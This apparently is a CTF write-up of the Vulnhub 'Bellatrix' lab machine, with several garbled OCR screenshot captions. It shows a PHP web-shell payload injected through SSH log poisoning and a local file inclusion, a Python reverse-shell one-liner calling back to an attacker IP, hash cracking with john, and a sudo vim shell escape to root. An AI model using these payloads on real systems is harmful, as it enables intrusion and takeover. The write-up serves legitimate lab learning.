• 3 minutes to read

Bellatrix Vulnhub Writeup

Tags: ctf php vulnhub Category: ctfs

The evil Bellatrix Lestrange has escaped from the prison of Azkaban, but as … Find out and tell the Minister of Magic

Difficult: Medium

This works better in VirtualBox

Hints –> Brute force is not necessary, unless it is required. ncat is the key ;)

Social-Media: Twitter –> @BertrandLorent9, Instagram –> @BertrandLorente9

NMAP #

Bellatrix NMAP Scan

Port 80 #

Machine generated alternative text: AvadaKedavra I Network Red Network Tools DARK ARTS ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack.php

Port 80 Source #

Port 80 ikilledsiriusblack.php LFI #

SSH Log Posioning # 

┌─[root@redteam2020] ─ [Fri Dec 04 14:24:56] [~/ctfs/vulnhub/bellatrix]
└──╼ # ssh '<?php echo shell_exec($_GET["j1v37u2k3y"]);?>'@192.168.9.128
<?php echo shell_exec($_GET["j1v37u2k3y"]);?>@192.168.9.128's password: 

┌─[✗]─[root@redteam2020] ─ [Fri Dec 04 14:25:59] [~/ctfs/vulnhub/bellatrix]
└──╼ #

ikilledsiriusblack.php?file=/var/log/auth.log #

Reverse Shell # 

 >>  22
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.9.129",1334));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' Copied to clipboard
┌─[root@redteam2020] ─ [Fri Dec 04 14:29:05] [~/ctfs/vulnhub/bellatrix]
└──╼ #

www-data shell #

Crack hash with custom wordlist and john #

Machine generated alternative text: Fri Dec 04 i@redtem2020 —/ctfs/vuLnhub/beLLatrix/Loots # john Swordofgryffindor - -wordlist=secret.dic Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 512/512 AVX512*/ 8x]) password hashes Left to crack (see FAQ) Fri Dec 04 14:33:35 L—/ctfs/vuLnhub/beLLatrix/Loots # cat Swordofgryffindor Lest range : $6$1e1j sdebFF9/ rsXH$Naj EfDYUP7p/sqHdy01FwNnLtiRPw1ueL14a8zyQ1dRULAomDN rnRjTPN5Y/Wi Fri Dec 04 toedteam2020 -/ctfs/vuLnhub/beLLatrix/Loots # john Swordofgryffindor - -wordlist=secret.dic - Invalid options ccnbination or duplicate option: " Fri Dec 04 L—/ctfs/vuLnhub/beLLatrix/Loots # john Swordofgryffindor lest range: ihatehar rypotter I password hash cracked, e left IFri Dec 04 i@redteam2020 L—/ctfs/vuLnhub/beLLatrix/Loots

Password for lestrange # 

lestrange:ihateharrypotter

SSH lestrange #

Sudo -l #

So in our case # 

sudo /usr/bin/vim -c ':!/bin/sh'

ROOT #

Machine generated alternative text: # cd / root nov 28 drvxr-xr-x nov 28 -rw-r--r-- 28 89. -rw-r--r-- nov 28 -ruxr-xr-x -rw-r--r-- drvxr-xr-x 28 88 nov 28 root. txt total 56 -rw-r--r- # cat 7 root 28 root roo t roo t roo t roo t 3 root 3 root roo t I root roo t roo t 3 root I root root roo t roo t roo t roo t roo t root roo t root root root roo t root root 4896 4896 1252 31B6 4896 4396 4B96 4896 161 688 47 66 4896 886 nov ago nov sep nov nov nov 27 14 nov 28 89 27 27 27 16 28 11:59 . 28:19 . 11:59 2819 21 15 11. : 22 : 89 : 137 : 137 : 26 18 •43 • 44 59 . bash history . bashrc . cache . config . dbus . local . profile root. txt script. sh . selected editor snap . viminfo l/ root {ead5a85a11ba466e11fced3B8d46Ba76} # id;hostname;date bellatrix vie 84 dic 2828 CET